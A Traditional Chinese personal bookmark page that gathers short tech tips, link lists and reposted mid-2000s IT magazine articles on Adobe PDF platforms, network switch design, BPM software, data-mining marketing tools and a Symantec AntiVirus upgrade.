落腳齋 » 將多個Mpeg檔或VCD燒成一片DVD-TMPGEnc DVD Author: "為了節省空間與方便觀看(省去換片的麻煩),常需要將多個 Mpeg 檔案或好幾片 VCD 燒錄成一片 DVD(也比較省錢咧!)。實際試用了幾套軟體(友立的拍拍燒、錄錄燒…etc),個人覺得 TMPGEnc DVD Author 是個挺方便的軟體,就可惜不是自由軟體,呵…好像要求太多。今天剛好幫朋友燒錄好看的大地之子電視劇,順便做個簡易教學說明(沒有最新版,以 1.6 版為例)。"
在網址http://tw.dictionary.yahoo.com/後面加上這排語法裡面的audio後面的網址
變成:http://tw.dictionary.yahoo.com/mp3/47/db/24860.mp3就可以下載了!
原出處http://tw.knowledge.yahoo.com/question/?link=best&qid=1106100801326&r=w
http://www.dafont.com/bitmap.php#top
http://www.dsg4.com/04/extra/bitmap/index.html
http://www.mydeskcity.com/GIF18.htm
http://www.hotdl.com/dl/default.php?category=51
http://www.angelfire.com/rpg2/nrew/emu.html
http://yu4579.myweb.hinet.net/new_page_43.htm
Seagate 送原廠直接寄桃園蘆竹就可以了
http://www.pcdvd.com.tw/showthread.php?t=447665
有關 Seagate 的硬碟維修
http://www.pcdvd.com.tw/showthread.php?t=235868&page=1&pp=10
http://www.pcdvd.com.tw/showthread.php?t=653981&page=1&pp=10
NEC 4570A 推一下 !!
BenQ 1640 / 1670 也都不錯 ...
以上3台機種 ..... MIM
剛到良興買了一台ND4570A...現金價...1450...
奧多比的企業文件平臺
強調PDF管理、安全與流程自動化,建構企業文件平臺
奧多比(Adobe)的可攜式文件格式(Portable Document Format,PDF),可以包含文字、圖片、影像、註解、聲音、網際網路連結、影片以及Shockwave Flash,或使用內嵌的方式連結到其他非PDF文件。奧多比以往採取檢視PDF檔免費,進階功能需付費的推廣策略。經過這些年,PDF已經相當普遍,不過其實可以做得更多。
奧多比的智慧型文件平臺,以PDF為核心,藉由安全的文件格式,讓員工、客戶和企業合作夥伴能夠在商業流程裡面,與企業應用程式同時搭配PDF使用。奧多比強調PDF可以協助個人化內容的傳遞、內外複雜協同作業,以及資訊系統與使用者之間的交易過程擷取。
奧多比認為,PDF智慧型文件平臺可以解決商務流程問題,例如高品質的文件建立、增進協同作業流程效率、跨組織與人員的資料擷取,以及自動化ERP、CRM等系統外的商業流程。
三組元件關係到奧多比的企業文件平臺︰智慧型文件、通用的用戶端程式和文件服務伺服器。奧多比的智慧型文件,能夠將靜態文件保持原貌,並且結合商務邏輯和資料傳送能力,使用者可透過Adobe Reader和網頁瀏覽器的用戶端程式存取這些文件,瀏覽器在大部分電腦已經相當普及,免費下載的Adobe Reader目前已經支援Windows、Unix、麥金塔和行動設備平臺,一般使用者可以隨時檢視PDF文件,從個人電腦到PDA、自助服務機(KIOSK)到行動電話都可以適用。至於文件服務伺服器,負責處理智慧型文件的建立與管理,和企業應用程式資料的整合功能。
奧多比的文件服務分成文件製作、協同作業、文件控制和安全與商業流程管理(Business Process Management,BPM)等四大項。
文件製作
奧多比認為PDF文件可以滿足企業跨平臺的安全性與可靠度需求,而且攜行方便,便於出版成電子書,文件格式的品質也可以達到輸出中心標準,直接交付印刷。使用者可以隨時部署在自己的電腦上產生PDF文件,電子檔案可以立即輸出成正式文件;利用PDF表單也能夠協同作業,幫助企業將所有的文件以更具結構性的方式歸檔。
文件製作的功能一向由 Acrobat系列主導,產品分成專業版、標準版和Acrobat Element 三種等級。Acrobat 6專業版功能最齊全,能夠建立電子表單,支援技術文件需要的繪圖圖層,從AutoCAD、Visio和Project應用程式內,也能夠進行PDF轉換。
Adobe Document Server較偏向與後端資料庫、多資料源的整合,企業資訊系統轉換成的XML,可匯入奧多比PDF套表,然後在文件伺服器產生、處理、組合。Adobe Document Server支援XSL-FO(eXtensible Stylesheet Language Formatting)和SVG(Scalable Vector Graphics),能夠建立內含文字、圖片和動態影像,兼具網頁和版面設計資訊的標準XML。
Adobe Central Pro Output Server專門管理PDF輸出與發布的事項,可從CRM、ERP等系統的資料,動態產生訂單、發票和支票等專屬文件,經由PDF、網站、電子郵件發佈,或是透過傳真和列印傳遞。Adobe Output Paks則是奧多比特別針對SAP和Oracle的ERP系統設計的文件套表和整合介面,企業可選購mySAP.com或Oracle E-Business Suite兩種預先定義好的資料引擎。在Output Server將資料套用文件範本轉換後,會交給Output Manager處理列印的相關事宜,確保失敗的列印工作自動重新列印,負載平衡處理印表機工作,協助診斷列印問題。既然整個奧多比文件都可以透過虛擬列印的方式,以PDF的格式將文件歸檔,EASY Archive提供易用的滑鼠拖放管理介面,並且支援全文檢索和內外網路的文件控管。
而Acrobat Elements Server是一套主從式架構的PDF文件製作與轉檔系統,一般使用者可透過網路分享資料夾、電子郵件或網站上傳等方式能夠將各種檔案轉換成PDF文件,另一方面Elements Server也能夠善用Web Services 的SOAP介面,與企業資訊系統整合。
協同作業
奧多比的文件協同作業服務,能夠直接以文件的方式互動,並在工作流程中使用數位簽章,核可交易合約或是工程製圖等重要文件,經由文件檢視的循環,文件能夠原封不動保留,維持完整性,假如想要稽核,使用者也可以追蹤相關文件中加註的意見與評論。小至工作群組,大至高度結構化的協同流程,企業可以實作數種等級的文件協同作業,整合到工作流程管理的解決方案。
奧多比認為協同作業的關鍵是賦予文件加註與稽核的功能,因此Acrobat 系列和免費的Adobe Reader屬於協同作業範圍。企業資訊系統的特色是資源集中、可應付大量處理,因此奧多比也推出Adobe Document Server For Reader Extension的產品,啟用Adobe Reader的隱藏功能,讓所有的使用者可以用既有的Adobe Reader,作為企業資訊系統的用戶端程式,允許使用者在線上或離線處理PDF表單的簽署、傳送和儲存等作業。
文件控制與安全
奧多比採用數位簽章(Digital Signatures)來保護文件的真實性(authenticity)、完整性和機密。數位簽章可協助文件的認證與授權交易,而文件控管會限制存取機密文件的相關人員,以及檢視、修改、再利用與列印等種種不同的權限設定。
Acrobat 6.0、Adobe Reader 6.0、Adobe Document Server、Acrobat Elements Server這些用戶端與伺服器產品可以提供文件加解密與存取權限的安全性控管,以Acrobat系列功能較齊全,Adobe Reader 6.0需要搭配Document Server for Reader Extension,才能夠簽署數位簽章,而Adobe Document Server 5.0目前尚未提供數位簽章的簽署與驗證功能。
奧多比PDF的使用者認證可以搭配LDAP,Acrobat 6.0目前文件密碼加密能力可橫跨40位元到128位元RC4等級,運用DES、RSA和RC4的演算法,而且也支援PKI(Public Key Infrastructure),讓每一個接受端可以配置不同的使用者權限。PDF輸出與修訂方面,Acrobat 6甚至能夠限定列印解析度高低、文字與圖片複製,以及表單欄位修改等細項。
商業流程管理
奧多比提出流程管理的文件服務解決方案,能夠處理ERP、CRM等企業營運系統產生的資料,提升資料應用的範圍,將這些手動作業能夠減少變更耗費的工時,自動化後提升使用率,並且可以管理和追蹤。
PDF表單可以建立書面表單外觀的範本套用,並且可以採用HTML 和 XML等多種格式,部署到其他電腦,一次設計,多次部署,而PDF也不只是靜態表單,欄位資料可以用來計算、驗證,與資料庫整合,或是透過XML彙整。PDF表單也支援數位簽章和二維條碼書面表單,能夠加速核准作業,企業也能夠繼續運用現有的資訊安全基礎結構,自動化書面表單資料擷取,方便資料整合到資訊系統。
除了前面提過的Acrobat、Adobe Reader 6.0、Document Server for Reader Extension,奧多比準備了Form Server和Workflow Server建置表單和部署商業流程。Adobe Form Server內含Form Designer,在建立PDF或HTML表單,可以很簡便的方式產生XML套表,Form伺服器可以線上處理下載後的網頁和PDF表單,提供自動驗證和計算後回傳到伺服器。Adobe Workflow Server利用XML作為資料交換基礎,提供流程設計、流程角色與規則建立、目錄服務整合,以及流程截止的時間提示。
完善的三層式網路架構
現今網路已經是每個企業都需要建置的基本建設,透過網路可以增強企業的通訊能力,並且能夠提升對消費者的服務能力,不過許多企業並沒有作好內部網路的建置規劃,因此時常發生網路連線上的問題,這些問題不全然是因為架構設計上的問題,而是沒有選擇適當的交換器,一旦選擇不當往往就會造成傳輸上的瓶頸,甚至降低原有的效能。因此在建置內部網路時,必須根據整體環境需求,選擇適當的交換器,特別是在伺服器區應該要採用Gigabit交換器,透過較高的傳輸速率及背板容量,提高整體效能呈現,並加速工作進行。
當企業e化程度越高,在伺服器端所需要的頻寬越大,對於Gigabit交換器的需求也越迫切。以目前10/100 BASE-T的環境而言,當每臺PC都向內部資料庫或伺服器要求資料時,往往會造成網路壅塞,在業務部門或會計部門特別會發生這種狀況,顯見整體內部架構必須重新設計,並且更換必要的設備。
一個完善的網路架構應該是屬於三層式架構,與連接網際網路的路由器部分開始,與路由器連接的核心交換器(core switch)屬於第一層架構,其下可分接數個工作群組交換器(workgroup switch),之後則可連接多個存取級交換器(access switch),將位於網路邊緣的一般使用者電腦連接在一起,並且構成一個完整的網路環境。
存取級交換器(access switch)一般來說可連接的埠數較少,並且傳輸速率也較低,以目前的網路使用率來說,基本的10/100 BASE-T已經足夠使用,這是因為一般使用者電腦時常在內部網路使用的功能,如資料庫、ERP、CRM或是公用資料夾等,所需要的頻寬都不大,100Mbps的傳輸速率就已經足以使用了。並且同一單位的可以使用同一臺交換器,增加彼此資訊交換的能力,也不會因為內部交換資訊而影響到其他單位的資訊傳輸能力,此類存取級交換器大多為第二層交換器。
而工作群組交換器(workgroup switch)則是連接數個存取級交換器,具有較強的交換能力,對於具有龐大網路架構的企業來說,工作群組交換器能夠提供跨單位間的資訊交換。在建置上多使用Gigabit交換器,以較高的頻寬容量讓存取級交換器間能夠使用最高速度交換資訊。此類交換器大多屬於第三層交換器,具備24埠以上的網路連接埠,較高的背板容量,並且可額外提供2埠或4埠的串接(uplink)埠往上連接核心交換器。
核心交換器往上連接路由器,可直接連往網際網路,對下提供工作群組交換器間交換資訊的能力,具有比其他兩類交換器還高的背板容量,一般來說,企業內部大多僅需1臺此類交換器即可應付內部網路的所有需求。許多提供網際網路服務的伺服器,如網頁伺服器、VPN閘道器或是防火牆等設備,都是直接與核心交換器連接,以獲得最佳的網際網路連線頻寬,降低內部網路其他設備或單位的干擾。
三層式架構的好處在於可以將各群組有效區隔開,將資訊交換頻繁的單位或設備放置到同一個存取群組之中,而把關係較為密切的相關單位放置到同一工作群組交換器之下,存取次數較少,但是每次存取都需要大量頻寬的設備則與核心交換器連線,藉以獲得較大的資訊交換能力。
以企業內部的區域網路而言,核心交換器除了連接工作群組交換器之外,也是連接儲存設備或網路的主要環節。這是因為儲存設備需要大量的頻寬,不過都是在固定時間運作,在一般工作時間並不會影響網路的傳輸速率,與核心交換器連結,可以讓儲存設備獲得最大的效能,並且儲存設備主要是備份重要伺服器與資料庫等的資料,而這些設備幾乎都是直接與核心交換器連接的,因此透過核心交換器可以降低對其他網段的影響,並且提高儲存效率。
交換器是建置網路所需的基本設備,不論網路規模大小,都一定需要交換器這種重要的中繼設備,不過並不是只要有就好,在建置的時候還是需要考量到許多面向,才能夠建置出適合企業使用的網路架構。臺灣思科技術總監楊士逸認為,選擇交換器除了考慮設備本身的效能之外,還包含了交換器的擴充性、功能整合性以及備援架構的設計等項目。
一般等級還是高階水準?
以大多數中小企業的作法來說,路由器之後大多直接與工作群組交換器連接,而省略了核心交換器,這種二層式架構可以降低成本,另外也因為員工人數不多,不需要太過於疊床架屋的複雜架構,透過精簡過後的網路架構,不但可以達到同樣的管理機制與功能,同時也可以加速資訊交換。
相對於此,位於內部網路頂端的交換器就如同是整個網路的總管,佔有十分重要的地位,這時候需要考慮的就是該臺交換器僅需一般等級就好,還是需要具備高階水準的能力。一般中階以上的第三層交換器都具備有VLAN及路由控制的功能,可以將內部網路切割成不同網段,讓不同部門的網段不會彼此干擾,也可以有效增加封包的交換效能,不過這種作法一般都會需要多臺交換器同時負責相同位階的封包交換任務,以避免因為大量封包湧入而讓交換器負荷不了,造成設備故障。
第四層以上交換器強調的則是封包交換的功能,反而不注重可連接的埠數是否足夠企業使用,一般在使用時,一個連接埠都是連接一個網路群組,並提供光纖通道以作為備援之用,並透過VLAN及路由控制的功能,能夠有效控制各群組間的封包交換,並有強大的背板交換能力。當企業需要分隔伺服器區、資料庫區及一般員工區時,部署一臺高階交換器就是可以一勞永逸的作法,並可以有效節省採購設備及布建線路的成本。
單一性能 v.s. 功能整合
中小企業對於網路功能的要求走向整合性,有許多具備整合性功能的產品也不斷面市,不但具備原有的封包交換功能之外,還加入了頻寬管理(Quality of Service)、負載平衡(Load Balance)或是防火牆等重要的網路功能,透過功能的整合可以增加設備的功能性,也能讓企業可以減少相關網路設備的採購需求,當此類設備僅使用交換功能時,與其他單一性能的產品並沒有太大的差異,但是當同時開啟其他功能時,就可以明顯發現到封包交換的能力下降,這是因為在設計上所有功能都必須經過內部的處理晶片計算後再送出,對於背板容量及運算能力都會干擾,因此設備就不能全力進行封包交換。如果企業要求的是功能價格比較好的設備,而不在意封包交換能力的話,這類功能整合的設備是相當符合的需求;但如果企業的型態是必須經常進行資料存取及交換的話,則必須要注重交換器的封包交換能力,這樣才能切合所需。
另外一方面來說,許多廠商都推出具有擴充性的交換器,不論是機櫃式(chasis)或是機架式(rack)都可以藉由多種模組提升交換器的連接方式及埠數,這也是因應企業不斷擴充設備,對網路存取的需求不斷提升而配合的設計,不過這時候需要考慮的就是背板的設計。當設備可以擴充模組時,交換能力的關鍵就在於處理晶片及背板容量是否能夠應付新增模組所帶來的壓力,雖然廠商在設計的時候一定會考量到後續擴充所需的壓力問題,並且推出相對應的模組,但是依然會對封包交換能力有所影響,機櫃式的交換器影響更大。
高可用性與備援真的重要嗎?
現今許多網路設備都具備有高可用性(High Availability,HA)或是備援功能,不論是本機硬體上的備援或是使用第二臺相同設備作緊急切換,都是為了因應資訊安全及無停機時間的要求。從設備硬體備援來看,備援的元件以電源備援為主,另一個目前常見的趨勢是網路連線備援,這項功能通常也搭配負載平衡功能同時使用,不過以本機備援來說,受限於成本與硬體架構的關係,有許多元件並沒有辦法備援,例如處理晶片與記憶體在單一設備中僅具備一組,沒有辦法做到備援的效能。倘若連處理晶片與記憶體都需要備援,則必須另外使用第二臺相同設備,架構出高可用性的環境,才能完全備援所有的硬體元件及軟體設定。
但備援或高可用性並不應該無限上綱,楊士逸認為企業必須審慎評估網路架構上的需求,分析重要設備或環節對HA的需求,確認有其必要再建置。因為要建置出HA的環境,首先就必須分析出該點需要的設備等級為何,並且必須使用同等級以上的設備作HA才能在故障時完全接續運作,而不致有任何中斷或效能降低的困擾。在網路規劃上,HA環境並不會有1+1=2的效果,而是1+1=1,企業必須付出加倍的成本,卻只能得到與一臺單一設備相同的效能。
當我們根據故障復原計畫評估停機時間所可能導致的損失之後,發現此損失遠大於採用備援或是高可用性設備,甚至是環境備援的話,自然應當選擇最適當的方式進行。不然以目前設備的穩定度而言,其實不必太過擔心設備故障的問題。
超義Power Process Suite
強調整合及服務的價值,避免淪為眾多WorkFlow產品之一
成立將近四年的超義科技,今年以文曄科技為成功案例,獲得WorkFlow組織WfMC(The Workflow Management Coalition)及WARIA(The Workflow and Reengineering International Association)環太平洋區金獎。獲獎的原因在於整合IBM WebSphere Portal、Power Process Suite及SAP ERP系統,使管理者透過瀏覽器即可管理日常作業,企業流程執行的結果也即時反應於SAP ERP上。
BPM的完整標準,分為處理人事的事務性表單、系統整合及B2B三方面,事務性表單著重內容的呈現,Power Process Suite以Power WebForm提供表單設計及管理工具;系統整合則以Power Process BPM設計流程並以配接器與其他系統串連;另外RosettaNet模組提供企業串連合作夥伴與客戶等系統的橋樑,滿足資訊流通的需求。
提供企業對內及對外整合的解決方案
超義科技提供的商業流程解決方案,包括ERP系統、IBM Notes、B2Bi及企業入口網站等的整合解決方案。企業內部透過超義科技開發包括資料庫、檔案、FTP及SAP ERP系統等的配接器(Adapter),讓BPM成為整合企業內部資源的神經系統。
直接存取資料庫整合系統是最低階的方法,SAP等ERP系統為保障穩定性,並不開放資料庫供其他系統直接存取,透過應用程式層級整合才是最有保障的方法。因此超義科技根據廠商提供的API開發配接器,作為應用程式間溝通的橋樑。目前Oracle ERP的配接器正在建置中,隨著各種客戶導入經驗的累積,未來將提供更多系統的配接器。
在IBM Notes解決方案,超義科技的工作流程可與Notes整合。此外,透過RosettaNet模組,支援RosettaNet垂直整合標準,對外可串連合作夥伴及客戶的系統。Web化已是大勢所趨的方向,Power Process Suite同樣使用Web化的介面,可與IBM WebSphere或企業自行開發的入口網站結合,豐富入口網站的功能。
百家爭鳴的標準,逐漸走向統一的格局
目前WorkFlow及BPM相關的標準不一而足,包括WfMC制定WorkFlow的標準、W3C有Web Services相關的標準、BPMI.org提出的BPMN(Business Process Modeling Notation)是BPM標記的標準、而OASIS組織則由微軟及IBM合作推出BPEL4WS。超義科技則是遵循WfMC提供的5個介面(Interface)標準,開發Power Process Suite。
一般認為BPEL4WS標準未來將成為BPM的主流,因此超義科技逐步依BPEL4WS標準,研發流程設計工具。BPEL4WS可謂流程的標準描述方法,如果市面上的流程設計產品均遵循統一標準,工具便有了可交流的統一語言,流程可匯出至其他同類產品繼續使用。
超義科技總經理黃仕鎮反而認為:「流程標記統一的意義,會大於流程描述統一的價值。」也就是BPMN大於BPEL4WS的重要性,因為企業同時使用兩套BPM系統,且彼此匯出/匯入流程的可能性不大。而且完全遵循BPEL4WS是完美的理想,各家廠商往往會增加專屬的規格,因此破壞互通性。而B2B的應用也不見得需要BPEL4WS,藉由ebXML、RosettaNet及EDI等標準,即可建立企業與合作夥伴電子化的訊息傳遞機制。
BPMI.org制定的BPMN則類似UML(Unified Modeling Language)的概念,由於使用一致的流程圖形表示法,企業無論搭配哪一家產品,設計人員均可輕易上手,減少學習的成本。
Power Process BPM
Power Process BPM的Process Engine為主要的流程引擎,搭配Process Modeler、Process Monitor、Event Manager、Organization Editor、Work Zone Manager、Integration Manager及Rule Manager等7大管理工具協助處理商業流程。
Process Modeler用以設計及定義流程,以拖拉點選節點的方式設計流程,並可定義流程變數。流程模擬及測試機制可協助開發人員確認流程設計邏輯,減少來回修正的時間。流程各節點中的表單可選擇URL、JSP、ASP或WebForm Editor開發的表單。
以Java開發的Power Process BPM,因為採用JCOM技術,所以可搭配ASP表單。JCOM(Java-COM Bridge)是一組程式庫,可串連Java與COM,使COM元件可被Java程式使用,例如在Java程式中使用Excel工作表或VB應用程式。
Process Monitor則是視覺化的監控工具,提供流程暫停、恢復、中斷、重新啟動及執行例外工作等功能,並可依管理者需求製作報表。Event Manager可設定流程自動執行的時間與頻率,定時啟動特殊或例行流程。Organization Editor即組織管理功能,支援多重組織及角色的設定,可編輯人員的角色以分派工作。Work Zone Manager依不同的國家或工作型態,可設定不同的工作時區,跨國企業即可精確計算各地員工的工作績效。
Integration Manager負責管理串連其他系統的配接器,例如ERP系統改版時,只需更動串接ERP的節點。當流程執行出現錯誤時,也容易除錯及維護。Rule Manager則是管理商業邏輯的機制,流程判斷以具體的物件化管理,可增加重複使用性,減少維護的負擔。
Form Editor頗具特色
從流程與資料分離的概念出發,Power Process BPM與微軟的BizTalk Server類似,是流程設計與管理的工具,且可串連應用程式取得流程中需要的資訊;而Power WebForm則與InfoPath類似,是一般WorkFlow事務性表單的設計工具,提供設計及管理表單的功能。
Power WebForm包括Form Manager與Form Editor,Form Manager分為表單管理系統及表單使用者工作區兩部分,表單管理系統包含目錄管理、存取控制、查詢管理及客製表單,提供管理者管理表單與系統設定功能;表單使用者工作區包含待辦事項、經手文件、文件查詢、內部表單及資料設定功能,使用者可填寫表單、執行待辦事項或查詢歷史記錄。
一般WorkFlow產品提供的表單編輯器,多為用戶端應用程式,若是透過瀏覽器執行的編輯器,不是被Web化的操作模式限制,必須不斷重新整理網頁取得更新的內容,就是必須下載元件,拖慢執行效率。
超義科技因應微軟的InfoPath與Adobe XML/PDF Form Designer Beta版,採用資料與表單呈現方式分離的概念,整合XML標準開發Form Editor。表單只是蒐集及呈現資料的容器,表單資訊可根據使用者角色與權限,提供個人化的呈現方式。
以Object-Oriented JavaScript及DHTML DOM的技術開發而成的Form Editor,是相當具特色的設計。由於支援XML標準,可跨平臺傳遞資訊。用戶端無須下載外掛程式,即可透過瀏覽器設計Web化的表單。Form Editor的設計介面類似Word,可隨意縮放欄位大小、設定屬性及資料源,並拖拉使用附件、編輯器及日期等元件,減少程式設計的時間。
Form Editor提供預覽功能,可檢視表單呈現的樣貌。表單內容為單純的JavaScript及HTML,可直接切換檢視原始碼,原始碼即設計碼的概念,讓美工與程式設計人員可協同合作。
服務與產品的價值並重
文曄科技董事長鄭文宗表示,自從2000年開始走向國際化後,每天處理數以千張傳真的訂單資料,不但難以彙整且沒有效率,資訊系統間重複輸入資料導致曠日廢時,也增加出錯的機率。資訊流動的速度決定工作效率,當資訊流動加快,也大幅提升決策的速度。藉由SAP ERP系統與Power Process Suite的整合,輔佐決策的相關數據一併顯示,使主管決策時更具信心。
以文曄科技單一案例獲獎,雖不見得可判定Power Process Suite的功能完整,但至少代表超義科技的客製化及顧問服務品質獲得肯定。BPM與WorkFlow發展的方向已經漸趨一致,兩者的定位都不是套裝軟體,從建置、系統操作到客製化,在在都需要廠商的協助,售後服務的品質,是專案成敗的關鍵因素。
資訊業等同於服務業,企業在選擇BPM產品時,除了考量價位,更應重視服務的品質。超義科技強調產品與服務的結合才能發揮最大效益,因此成立專業服務部,與客戶建立永續的夥伴關係。
UniMarketing
以資料採礦技術分析銷售客戶的相關資訊,進而根據購物習性預測出合適的商品組合
探宇科技的UniMarketing,以資料採礦(Data Mining)技術為基礎,藉著分析資料庫、資料倉儲等各種資料來源,產生產品差異化行銷分析,而且提供預測客戶購買行為的套裝功能。
UniMarketing的參考客戶以金融保險和百貨零售業為主,金融商品銷售需要掌握客戶的風險評估、信用評等、資產與貢獻度,以及利率額度分析;百貨零售業者應用的理由是販賣品項繁多,需要策畫特賣活動,寄送DM通知顧客,吸引人潮到賣場購物,需要準確的會員管理。
UniMarketing的分析流程
UniMarketing以Java開發,使用主從式架構,使用者透過網路連線,至伺服器端操作UniMarketing分析系統,也可以根據企業需求調整成應用伺服器的延伸架構,在資料分析前,須先匯入相關資料,轉換成具有資料綱要(Data Schema)的DSC檔,如果要進行有關購物習性的協銷分析和序銷分析,資料源需要再次轉換成二進位格式的BTF檔,以及用來對照產品代號、名稱的MAP檔。UniMarketing在用戶端程式的使用者介面,提供客戶價值和購物習性兩種分析資料準備的功能,作為系統資料分析的基礎。
資料匯入系統後,根據預設參數,會重新定義資料,區分出過濾欄位、新增欄位、資料取樣等系統欄位,產生成DSC格式的純文字資料物件,執行分析處理後,系統會建構對應的資料模型,將結果以圖表呈現。資料模型出爐後,接著可以進一步預測未來後續的新進資料將會歸屬的分類。
由於每一次分析處理的資料準備,需要的檔案通常包括資料源、DSC檔、BTF檔、MAP檔,因此分析處理以專案檔的方式囊括這些資料檔,方便管理,這些資料檔根據屬性不同,又分成系統資料共用區和使用者個人區,系統共用區是全體使用者共享的,擁有管理權限的人才能修改或新匯入資料到這個區域;使用者個人區的資料只能供登入使用者存取與管理,其他使用者無法檢視。與其他商業智慧系統相比,資料呈現與共享的權限控管方面相當有限,只有一般、進階和管理員3種,無法依照部門或群組控管資料權限,使用者少時,或許不需要控管得太仔細,如果應用在使用者眾多的大型企業,就會很需要與階層職務相關的資料或應用程式權限功能。
資料處理作業
外部資料匯入分成純文字檔和資料庫兩種處理方式,純文字檔的資料需要一定順序的排列,才能夠轉換成有意義的資料;資料庫的存取透過ODBC取得資料源連結,匯入功能可以支援資料表相互參照(Join)的處理,轉換成SQL指令執行,習慣SQL指令的使用者,可以在SQL視窗直接鍵入指令,執行資料庫處理。
匯入資料後,要進行資料準備,轉換成系統需要的各式檔案,UniMarketing特別提供「漏失值處理」的功能,在轉換過程中根據預先設定的資料值,自動補登錄,以便提高資料採礦的有效性。
分析作業的速度取決於資料量與處理能力,初期幾次使用之後,就可以確定例行的處理作業,UniMarketing的作業管理員提供分析工作排程與管理功能,即使想臨時中斷分析作業,可以從作業管理員中停止或暫停該項工作。
分析作業
分析作業設定時,除了初步呈現匯入後的資料,可以增加衍生欄位,增加資料呈現的彈性,並且支援記錄篩選的設定,只呈現使用者需要的區間資料或取樣資料。衍生欄位是指將某些欄位配合運算式或常數做特殊需求的處理,例如我們可以設定薪資除以小孩數目等於消費能力的公式,以便自動產生消費能力這個原先資料表沒有的欄位;記錄篩選可以設定區間資料,透過設定大於、小於等判斷式篩選特定欄位的資料。
客戶行為分析管理包括分群、行為與貢獻度分析,UniMarketing採用群集化(clustering)和分類(classification)的方法分析。分群可以將每一群的特徵整理後,根據這些屬性(例如性別、職業、居住地區)的密集程度,進行分群,歸納出現後,使得現有顧客與潛在顧客所屬的族群,能夠以聚焦的方式浮現,便於企業研擬相關行銷策略。行為分析會採用目標式客戶區隔分析法,記錄特定的消費習性(例如有些顧客特別熱中折價券、來店禮、高價精品),之後將客戶區隔(segmentation),以決策樹方式展開這些區隔,建立模型,操作者可以很清楚地看到每一群對象隨著階層的累積而持續遞增的各項特徵。貢獻度用量化屬性(例如消費金額與次數)作為分析目標,也採用目標區隔方式,用決策樹歸結出哪一群客戶的貢獻價值最高,提供操作者檢視推論分析出的資料因素。
購物習性分析可分成協銷(association)和序銷(sequential)的規則分析。商業智慧廠商經常會引用威名百貨(Wal-Mart)的例子,購物籃分析(market basket analysis)能夠找到顧客在週末同時購買啤酒與尿布的關聯性,這個例子正好也充分說明協銷和序銷的重要性。協銷是從相同時間的購物明細資料中,找出關聯程度最高的商品組合,適用在交叉銷售(Cross Selling);序銷則可以長期分析顧客在不同時間購買產品的先後關係,會應用在向上銷售(Up Selling),目的也是找出關聯程度高的商品組合。
客戶價值分析UniMarketing提供期間、頻率、金額、客戶忠誠度(Customer Loyalty Value)的分析,以圖表方式呈現客戶流失的原因、來店頻率、累計消費金額,推算出顧客的忠誠度。期間分析透過計算客戶最後一次來店時間距離現在時間的長短,分出等級,企業可視顧客來店的周期區分顧客價值。頻率分析,是來店次數另一種計算方式,頻率越高,可能代表顧客的認同與滿意越高,假如發現顧客來店頻率明顯降低,能夠立即研擬對策,開始著手發現問題的根源。忠誠度會使用RFM數值法進行運算,RFM是指前次購物時間(Recency)、購物頻率(Frequency)、購買金額(Monetary)。
預測分析上述所有的分析作業背後皆會產生預測模型,根據預測的信賴度,可以只檢視信賴度高的分析結果。資料隨著每天的營運不斷增長,UniMarketing讓新進的資料也能用來驗證預測模型的準確度,在客戶行為分析預測的功能,提供Gain Chart、Lift Chart和Effect Gain三種圖表的檢視,作為參考。
目前的商業智慧絕大多數屬於歷史資料的分析,關於資料採礦領域的延伸,以資料分析技術為主的產品,也不一定熟悉各行業專屬領域的需求,UniMarketing的長處,在於功能很固定,而且具有與金融保險、百貨零售業者合作的經驗,操作上雖然不夠直覺,經過適當的教育訓練之後,可以很快上手,對中小型的金融與零售業相當適合。
Symantec AntiVirus升級之路
每年的4、5月,是許多軟體廠商推出新版本的時間,有人會立即將產品升級,有人會等幾個月後才有所行動,也有人無動於衷。希望藉由iThome的親身經驗,能協助你做出最佳的判斷。
從iThome電腦報周刊創刊之後,我們就建置防毒伺服器,由於它一直都很正常的運作,沒有出過什麼事(當機、中毒、系統毀損),所以我們也就抱持著「以不變應萬應」的想法,讓它陪伴我們至今。直到今年初,Symantec的LiveUpdate漏洞被發現,讓iThome重新檢視防毒架構。
該不該升級?
許多IT主管都是以不變應萬應,隨著事件發生而作出應變,但這樣的方式似乎弊多如利,倒不如先做好事前的預防工作,才能減少事後的修補工作。雖然廠商推出新版本是基於商業考量,但其中仍有不錯的部分,值得我們選購與升級。
以下是iThome此次升級Symantec AntiVirus 8.1的幾項考量因素:
成本:iThome原先是購買Norton AntiVirus 7.6企業版(7.x之前稱為Norton AntiVirus,8.0以後更名為Symantec AntiVirus),也是企業授權用戶,產品升級是權利之一,也不需要再花費額外的成本,若企業單買產品或未買升級授權,即可能要再支付一定的費用。另外,產品的軟硬體需求或許會提高,在升級前必須先更新軟硬體,也要額外付出成本。
新增功能:這應該是許多企業升級時的主要考量,以Symantec AntiVirus 8.x版為例,它跟原先7.x的架構相同,但支援更多的作業平臺、病毒碼採用累進式更新、掃描時間縮短、主動稽核網路、可針對不同部門設定不同的防護政策……。
在病毒碼方面,之前每天必須下載完整的病毒碼,但8.x版則是使用累進式更新,每天只要下載16kB的病毒碼即可,無形中減少許多網路負責擔。針對不同部門設定不同的防護政策也是不錯的功能,以iThome為例,雖然所有人都是由MIS負責設定,但技術編輯在測試時需要暫時關閉防毒系統,此功能可針對不同的群組(部門、使用者)制定不同的防護政策。
修補漏洞:許多新版本的應用程式是用來修補漏洞,像LiveUpdate 2.0、WinZip 9.0等,會消除原先的弱點或漏洞,雖然Symantec AntiVirus並沒有LiveUpdate的漏洞,但我們是從它開始升級計畫。有需要的使用者可到Symantec網站下載LiveUpdate 2.0中文版。
風險:有沒有風險存在?廠商給的答案是沒有,但我們在測試時就遇到一個狀況,因為Symantec AntiVirus 8.0的一個bug,執行排程掃描時,它會讓用戶端的處理器使用率高達99%,如果IT人員一時不察,那後果可想而知。另外,企業所使用的應用程式也可能與防毒系統相衝突,可能原因是使用相同的通訊埠或記憶體區塊,特別是本土廠商和企業自行開發的應用程式。所以,除了拿最新的版本進行測試,在升級前一定要先做好備份工作。
專家指導:專家一出手,便知有沒有。這次我們請到Symantec技術顧問林育民及銳傑科技系統工程部經理廖竣生,指導我們如何規畫系統架構、進行版本升級,並解答疑問。專家除了有較多的資源,經驗也比較豐富,能解決你所遭遇到的問題,例如上述的Symantec Antivirus 8.0問題,林育民只花了1分鐘就找到答案。
輕鬆升級無負擔
經過評估後,我們也開始著手準備系統升級。典型的Symantec AntiVirus有6個安裝步驟,從擬定安裝計畫、安裝Symantec System Center與主控臺元件、安裝Symantec AntiVirus伺服器、安裝Symantec AntiVirus用戶端、安裝Symantec隔離所及安裝Symantec AntiVirus Quarantine Console,最後兩項非必要。這些都可在Symantec網站找到。
